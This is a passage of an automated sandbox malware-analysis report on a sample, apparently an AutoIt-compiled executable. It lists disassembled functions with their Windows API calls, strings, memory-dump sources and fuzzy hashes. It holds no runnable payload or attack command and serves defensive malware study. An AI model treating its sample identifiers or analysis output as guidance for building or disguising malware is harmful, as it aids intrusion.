                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                                              • _wcscat.LIBCMT ref: 0048C6EE
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                                              • DragFinish.SHELL32(?), ref: 0048C75E
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                                                              • API String ID: 169749273-3863044002
                                                                              • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                              • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                                              • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                              • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                                              Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 1038674560-1810252412
                                                                              • Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                              • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                                              • Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                                                              • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                                              Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                              • GetCursorInfo.USER32(?), ref: 004750C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                              • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                              • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                              • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                              Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0048A259
                                                                              • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                              • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                              • GetDesktopWindow.USER32 ref: 0048A40D
                                                                              • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                              • String ID: 0$tooltips_class32
                                                                              • API String ID: 1297703922-3619404913
                                                                              • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                              • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                              • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                              • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                              Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                              • API String ID: 3974292440-4258414348
                                                                              • Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                              • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                              • Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                              • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                              Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                              • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 2698844021-4113822522
                                                                              • Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                              • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                                              • Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                              • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                                              Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                                              • GetFocus.USER32 ref: 0048C20C
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                                              • _memset.LIBCMT ref: 0048C342
                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                                              • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1296962147-4108050209
                                                                              • Opcode ID: ad5beb81f0ada449b327263f74f2cb26782bdfb8b89f9167df52625f6eec0ab5
                                                                              • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                                              • Opcode Fuzzy Hash: ad5beb81f0ada449b327263f74f2cb26782bdfb8b89f9167df52625f6eec0ab5
                                                                              • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                                              Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0047738F
                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                                              • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                                              • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                                              • SelectObject.GDI32(00000006,?), ref: 00477470
                                                                              • DeleteObject.GDI32(?), ref: 00477479
                                                                              • DeleteDC.GDI32(00000006), ref: 00477480
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                              • String ID: (
                                                                              • API String ID: 2598888154-3887548279
                                                                              • Opcode ID: 2b762dd708e2377d79d2aa21dcf5ff924cc219c5593e0a4811c06dcfc48b0eee
                                                                              • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                                              • Opcode Fuzzy Hash: 2b762dd708e2377d79d2aa21dcf5ff924cc219c5593e0a4811c06dcfc48b0eee
                                                                              • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                                              Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                                                • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                                                • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                                                • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                              • API String ID: 537147316-1018226102
                                                                              • Opcode ID: c82d8282c772c613b2266dfa37dcd09a3a43a727d7e8e88506e67a441d56367e
                                                                              • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                                              • Opcode Fuzzy Hash: c82d8282c772c613b2266dfa37dcd09a3a43a727d7e8e88506e67a441d56367e
                                                                              • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                                              Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00462D50
                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                                              • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                                              • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                                              • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                                              • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                                              • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                                              • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                                              • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                                              • GetCursorPos.USER32(?), ref: 00462F56
                                                                              • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                                              • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 3993528054-0
                                                                              • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                              • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                                              • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                              • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                                              Function 02F524FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___free_lconv_mon.LIBCMT ref: 02F52543
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53090
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530A2
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530B4
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530C6
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530D8
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530EA
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F530FC
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F5310E
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53120
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53132
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53144
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53156
                                                                                • Part of subcall function 02F53073: _free.LIBCMT ref: 02F53168
                                                                              • _free.LIBCMT ref: 02F52538
                                                                                • Part of subcall function 02F52096: HeapFree.KERNEL32(00000000,00000000,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?), ref: 02F520AC
                                                                                • Part of subcall function 02F52096: GetLastError.KERNEL32(?,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?,?), ref: 02F520BE
                                                                              • _free.LIBCMT ref: 02F5255A
                                                                              • _free.LIBCMT ref: 02F5256F
                                                                              • _free.LIBCMT ref: 02F5257A
                                                                              • _free.LIBCMT ref: 02F5259C
                                                                              • _free.LIBCMT ref: 02F525AF
                                                                              • _free.LIBCMT ref: 02F525BD
                                                                              • _free.LIBCMT ref: 02F525C8
                                                                              • _free.LIBCMT ref: 02F52600
                                                                              • _free.LIBCMT ref: 02F52607
                                                                              • _free.LIBCMT ref: 02F52624
                                                                              • _free.LIBCMT ref: 02F5263C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                              • String ID:
                                                                              • API String ID: 161543041-0
                                                                              • Opcode ID: 4e455f17ad10af6f702f329a742b684d7d51f00777a5415a908eda915fd52e93
                                                                              • Instruction ID: 3dc8cc084f07505b336b5d9ed9c1b3194306bc834e810c85bbfc88d5051893cf
                                                                              • Opcode Fuzzy Hash: 4e455f17ad10af6f702f329a742b684d7d51f00777a5415a908eda915fd52e93
                                                                              • Instruction Fuzzy Hash: 42313872A003219BEB31AA38DC54B56B3EABF01791F144669EF5AD7250DF71E980CB10
                                                                              Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 004788D7
